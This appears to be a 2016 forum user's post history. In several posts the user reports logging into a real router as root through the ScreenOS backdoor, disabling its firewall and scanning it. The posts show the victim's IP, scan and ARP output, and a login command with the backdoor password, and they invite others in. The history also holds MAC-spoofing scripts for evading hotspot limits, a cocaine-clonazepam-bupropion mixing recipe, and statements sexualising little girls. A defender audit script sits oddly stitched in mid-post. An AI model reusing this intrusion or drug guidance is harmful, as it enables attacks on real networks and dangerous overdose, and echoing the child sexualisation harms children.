Posts by Sophie
-
2016-01-27 at 8:54 PM UTC in What is objectively the best (sub)forum on niggasinin.space
Votes below.
-
2016-01-27 at 7:54 PM UTC in Would everyone here be interested in a Bill Krozbylet.net?
lol why? I thought you were my friend
Because you've been a proper asshole to me in the past. That and i don't think you have what it takes to run a forum. -
2016-01-27 at 7:29 PM UTC in I'm bored
Drugs.
-
2016-01-27 at 7:26 PM UTC in Would everyone here be interested in a Bill Krozbylet.net?
I reconsidered.
-
2016-01-27 at 6:56 PM UTC in Ok guise lets commandeer this network for keks.
inb4 honeypot
Nice job, SWIY.
A word of caution though:
SSH may also log your public key fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.
As far as what to do next:
You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the arp table, routing table, dhcp entries. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the arp table with the dhcp table and then find out the mfg of connected devices from their mac addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kinda traffic is going in and out. This is all completely passive - you're not interacting with the network in any way so you shouldn't set off any IDS or anything.
As far as active recon, I don't have any ideas right now.
"get nat"
Didn't give me anything. "get dhcp" told me DHCP server is enabled but:
bgroup0: DHCP server is enabled
Total 0 MACs are queued by DHCP relay.
Truth be told i'm not much of a network engineer, furthermore, ScreenOS has other 'command' conventions than what i'm used to. Also:
Get us some more info on the clients, see what's diddling around, what services, OSes they like etc
I would but first i'll be looking into some ScreenOS commands some more to actually get the thing to do what i want it to do. Any tips would be welcomed. -
2016-01-27 at 6:36 PM UTC in How to get the most out of you cocaine.
Booze is complimentary.
-
2016-01-27 at 6:32 PM UTC in How to get the most out of you cocaine.
So today i was bored so i decided to get some coke, coke is rather lackluster and is over in a jiffy so here's what you'll need:
- 1 gram of cocaine 16mg of clonazepam 75mg of bupropion/Wellbutrin.
You start off by crushing all drugs into a fine mist. After doing so you combine them all in a little vial. Shake it up and voila. The bupropion will make the coke last a little longer and make the comedown more bearable and the clonazepam will take the edge off. Result: 10/10 coke that's at least worth the money. Pic related:
-
2016-01-27 at 6:24 PM UTC in Help a brother create a script/program
Here's what I have so far. I can spoof my MAC to a random address with this and I can return it back to the original (but it does require me to enter it in beforehand).
#!/bin/bash
# Hex digits used to build the random part of the MAC
hexchars="0123456789ABCDEF"
rndMAC=
# Original MAC, has to be entered by hand beforehand
origMAC=00:00:00:11:23:11

# Print an optional message to stderr and exit
function die() {
    [ -n "$1" ] && echo "$1" >&2
    exit 1
}

function help() {
    cat << EOF
Usage: $0 [args]
-h, --help - Print this help and exit
-r, --run - Spoof MAC every 55 minutes and connect/login to hotspot
-s, --spoof - Spoof MAC address to a randomly generated address
-u, --unspoof - Return spoofed MAC address to original MAC address
EOF
}

# Build a MAC with a fixed 00 first octet and five random octets
function genMac() {
    end=$( for i in {1..10} ; do echo -n "${hexchars:$(( RANDOM % 16 )):1}" ; done | sed -e 's/\(..\)/:\1/g' )
    rndMAC=00$end
}

# Set the MAC address of wlan0 to $1
function changeMac() {
    MAC="$1"
    service network-manager stop
    ifconfig wlan0 down
    ifconfig wlan0 hw ether "$MAC"
    ifconfig wlan0 up
    service network-manager start
}

function run() {
    # Loop instead of calling run recursively, which never returned
    while true; do
        genMac
        changeMac "$rndMAC"
        # should automatically connect due to previous connections
        # login is next (TODO)
        # wait 55 minutes
        sleep $(( 55 * 60 ))
    done
}

if [ "$UID" -gt 0 ]; then
    die "RUN AS ROOT NIGGA"
fi

while [ $# -gt 0 ]
do
    case "$1" in
        "-h"|"--help")
            help
            die
            ;;
        "-r"|"--run")
            run
            ;;
        "-s"|"--spoof")
            genMac
            changeMac "$rndMAC"
            ;;
        "-u"|"--unspoof")
            # changeIface was never defined; changeMac is the function meant here
            changeMac "$origMAC"
            ;;
        *)
            help
            die
            ;;
    esac
    shift
done
I'll use BurpSuite when signing up for a new session and see what kind of HTTP requests will be needed to be sent. I'm assuming it'll be a GET to receive a cookie, and then one POST with the needed parameters (Zipcode and Email address, along with the check of a terms button), although there may be another GET when first requesting a guest session.
As far as the requests go, from my searches it looks like cURL is the way to go. Is this correct?
Yeah i'd use curl.
Also:
It's 7AM and i've been up all night, so I don't really want to type a bunch of code but fuck it.
By the way, if anyone wants to learn shell scripting and pen testing check out https://overthewire.org/wargames/bandit/
do not use ifconfig it is soon to be deprecated.
Highly recommended to use macchanger
run this, or macchanger as a cron job: http://www.unixgeeks.org/security/ne...ix/cron-1.html
1. IDGAF (I Don't Give A Fuck) what you do with my code*.
2. If you claim my code as your own, you will probably just be embarrassing yourself.
* As long as you don't use my code to make gay pronz
#!/bin/sh
# add me to cron job
# released under IDGAF licence
# 1. IDGAF (I Don't Give A Fuck) what you do with my code*.
# 2. If you claim my code as your own, you will probably just be embarrassing yourself.
# * As long as you don't use my code to make gay pronz.
if [ "$(id -u)" != "0" ]; then
    echo "This script must be run as root nigga" 1>&2
    exit 1
fi
interface="wlan0"
# uses ip as ifconfig is soon to be deprecated
old_mac=$(ip link show "$interface" | awk '/link\/ether/ {print $2}')
# 02 = locally administered unicast first octet (a random first octet can
# have the multicast bit set, which ip link rejects), then five random
# octets, colon-separated as ip link expects
new_mac=$(printf '02'; dd bs=1 count=5 if=/dev/urandom 2>/dev/null | hexdump -v -e '/1 ":%02x"')
printf '(%s) Changing mac [%s] to [%s]\n' "$interface" "$old_mac" "$new_mac"
# not the best
ip link set dev "$interface" down
ip link set dev "$interface" address "$new_mac"
ip link set dev "$interface" up
# better to use
# macchanger -r $interface # fully random mac
# macchanger -e $interface # changes device info, leaves vendor as is.
# macchanger -p $interface # go back to hardware defined value
use curl or curl.
Write a program that does the website part of things, and just call macchanger and all will be good for spectraL
I don't know who you are, but you should stay, hang out with us, make scripts, pwn noobs that sort of thing. You strike me as a person who enjoys those types of activities. -
2016-01-27 at 1:23 AM UTC in Would everyone here be interested in a Bill Krozbylet.net?
If Bill Krozby is going to make a website i will make it my mission to fuck his shit up.
-
2016-01-27 at 12:21 AM UTC in Would everyone here be interested in a Bill Krozbylet.net?
Bill Krozby as admin, lmao, that'd be the day.
-
2016-01-26 at 12:34 PM UTC in What elements do you find most attractive in a girl?
Lol, no.
Where is Lock?
kinda bummed he's not around. …miss his posts, same with benny vader
Lock has been awol for a while now. -
2016-01-26 at 12:15 PM UTC in Ok guise lets commandeer this network for keks.
You may recall my thread on ScreenOS router backdoors. http://niggasin.space/forum/technoph...list-by-sophie If you haven't read it already, you should, it's an interesting thread. Anyway i SSH'd into a backdoored router to see if i could do anything interesting, i'm root so i can basically do anything i want. First i dropped all screens (firewall rules) then i was able to portscan the IP in question. Here's the results.
Starting Nmap 6.47
Nmap scan report for rrcs-24-213-214-22.nys.biz.rr.com (24.213.214.22)
Host is up (0.023s latency).
Not shown: 808 filtered ports, 189 closed ports
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
8181/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds
The http-proxy service redirects from 24.213.214.22:8080 to 24.213.214.22:8181 which is a login screen, https://24.213.214.22:8181/index.html probably for remote access to the router via HTTPS. Querying the administrative configuration seems to corroborate this.
HTTP Port: 8080, HTTPS Port: 8181
TELNET Port: 23, SSH Port: 22
Manager IP enforced: False
Manager IPs: 0
Address Mask Vsys
---------------------------------------- ---------------------------------------- --------------------
Mail Alert: Off, Mail Server:
E-Mail Address:
E-Mail Traffic Log: Off
Configuration Format: DOS
Device Reset: Enabled
Hardware Reset: Enabled
Admin privilege: read-only (Remote admin has read-only privileges)
Max Failed Admin login attempts: 3
Lock admin accounts on auth failure: On, locking time 3 minutes
HTTP redirect: true
Also note how admin privilege says we should have "read only" privilege, well that would be true if we logged in with a regular admin account but the nature of the backdoor is that you login as sys/root. There's also a number of devices connected to the router as the arp table shows:
usage: 6/1024 miss: 0
always-on-dest: disabled
-----------------------------------------------------------------------------------------
IP Mac VR/Interface State Age Retry PakQue Sess_cnt
-----------------------------------------------------------------------------------------
192.168.55.255 ffffffffffff trust-vr/bgroup0 STS 0 0 1
192.168.55.200 0000aafb5ea6 trust-vr/bgroup0 VLD 693 0 0 0
24.213.214.21 0000ca000003 trust-vr/eth0/0 VLD 666 0 0 9
192.168.55.105 7427eaf334d5 trust-vr/bgroup0 VLD 1180 0 0 2
192.168.55.114 08000f678d32 trust-vr/bgroup0 VLD 494 0 0 2
192.168.55.115 08000f678f4e trust-vr/bgroup0 VLD 313 0 0 2
Now i was wondering, since we own the router and firewall what would be the next logical step in securing the rest of the network? Feel free to SSH into the thing and come have a look.
ssh -l administrator 24.213.214.22
Password: <<< %s(un='%s') = %u
Here's a list of basic commands.
http://www.skullbox.net/screenos-cheat-sheet.php
Here are some more obscure commands including those for displaying all commands available.
http://www.cymru.com/gillsr/document...n-commands.htm -
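A defender-side check of the settings quoted in the post above, as an added example that is not part of the original post: it reads the admin settings together with the ports the scan found reachable, and reports which management services answer from outside and whether management logins are restricted by source address. The function names and the EXPOSED/UNRESTRICTED labels are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post). Function names and the
# EXPOSED/UNRESTRICTED labels are assumptions of this example.

# Sample input: admin settings as quoted in the post above.
sample_admin_output() {
cat <<'EOF'
HTTP Port: 8080, HTTPS Port: 8181
TELNET Port: 23, SSH Port: 22
Manager IP enforced: False
Manager IPs: 0
Admin privilege: read-only (Remote admin has read-only privileges)
Max Failed Admin login attempts: 3
Lock admin accounts on auth failure: On, locking time 3 minutes
HTTP redirect: true
EOF
}

# audit_admin "<ports reachable from outside>" < admin-settings
# Prints one finding per line.
audit_admin() {
    awk -v openports="$1" '
    {
        # A line may carry several "Key: value" pairs separated by ", ".
        n = split($0, parts, ", ")
        for (i = 1; i <= n; i++) {
            p = index(parts[i], ": ")
            if (p > 0) cfg[substr(parts[i], 1, p - 1)] = substr(parts[i], p + 2)
        }
    }
    END {
        m = split(openports, o, " ")
        for (i = 1; i <= m; i++) reachable[o[i]] = 1
        # Management services whose configured port answers from outside.
        k = split("HTTP HTTPS TELNET SSH", svc, " ")
        for (i = 1; i <= k; i++) {
            port = cfg[svc[i] " Port"]
            if (port != "" && (port in reachable))
                print "EXPOSED " svc[i] " " port
        }
        # No source-address restriction on management logins.
        if (tolower(cfg["Manager IP enforced"]) == "false")
            print "UNRESTRICTED manager-ip"
    }'
}

# Ports reported open by the scan quoted in the post.
sample_admin_output | audit_admin "22 8080 8181"
```

Every line it prints is a management-plane finding; an empty result means none of the configured management ports were in the reachable list and source restriction is on.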
2016-01-26 at 9:54 AM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
U gay.
Not really i like small tits on little girls. -
2016-01-26 at 9:39 AM UTC in Numerous Ruby on Rails vulns discovered!
Not sure, seems like a pretty specific thing to fuzz for i think it's a combination of both. Kind of like how bug bounty hunters go about their testing, in part reverse engineering, in part fuzzing on the basis of what you found while dissecting the code.
-
2016-01-26 at 4:45 AM UTC in Not that I'm a shameless "thanks" whore...
I had 36,000 Thanks on Zoklet, and yet I was the most hated. Go figure.
Let's keep it realistic here and go an order of magnitude down. Nobody had 10k+ thanks, until Iam(Richard Burnish) exploited a bug in the thanks system and people got around 6mil. -
2016-01-26 at 3:54 AM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
HNNNGGGG. Goddamn this is a gorgeous rack. https://eroshare.com/tgrfx5eb
Not really. -
2016-01-26 at 1:55 AM UTC in Wats the most unordinary meat you've ate?
Squirrel
Rabbit
Grouse
Pheasant
alliGAYtor
Kangaroo
Buffalo Testicles
Grasshopper
Groundhog
Snake
Cow tongue
Squid
Octopus
Turtle
Salmon Eggs
Eel
Shark
Swordfish
Can't think of any more at the moment. I love eating exotic meats and I am an active outdoorsman. I really want to eat dog, cat, and horse but I can't find any to eat. When I was in the service there was this dude from South America who loved eating Guinea pig so we kept trying to find one so we could cook it.
Don't kill and eat a cat. I'll be upset with you if you do. -
2016-01-25 at 8:37 PM UTC in here's a new forum for you spuds
As I've always said, it's not over until I say it's over. Do you not find it amusing how every single BBS-clone was blasted off the face of the Web, and yet this one is coasting along problem-free? Not even a ripple in the pond. Do you really think that is a coincidence? If you do, I have a golden bridge to sell you cheap.
-
2016-01-25 at 6:01 PM UTC in here's a new forum for you spuds
I completely get that spectral has crazy reasons, but his conclusion is still correct.
Namely, it's over. Let's move on. It's cool to have niggasinspace and do what we do, but having a billion sister sites altogether floating around originating from the same community with ostensibly the same goal makes the original totse look like a bunch of whiney bitches who never grew up.
Knowledge and freedom are cool, but just go on like one of the chans or something.
Right, honestly though when it comes to the users i prefer people here over the people from the chans. Even though chronophilia is more widely accepted at 8chan and certainly masterchan. I just like our people better. -
2016-01-25 at 5:56 PM UTC in Chiggeddy Check Yaself
"I'm not like them but I can pretend".
I wish I could. Do you catch yourself biting your lips when a loli walks by? I'm super self-conscious. I'd just have to admit it.
I was in a class with mostly girls once and a girl made a joke about prostate massages and I was like "Oh yea, that's awesome" and didn't realize it fast enough to do damage control so the whole room gave me the stinkface look. Haha. Yea…
Kek, you need to work on your mind enhancement. And no, i don't bite my lip either figuratively or literally, i just get happy when i see a really adorable little loli, but you wouldn't be able to tell. My thoughts are only betrayed by my behavior/body when i intend them to. Unless i'm angry, everyone can tell i'm angry when i am lol.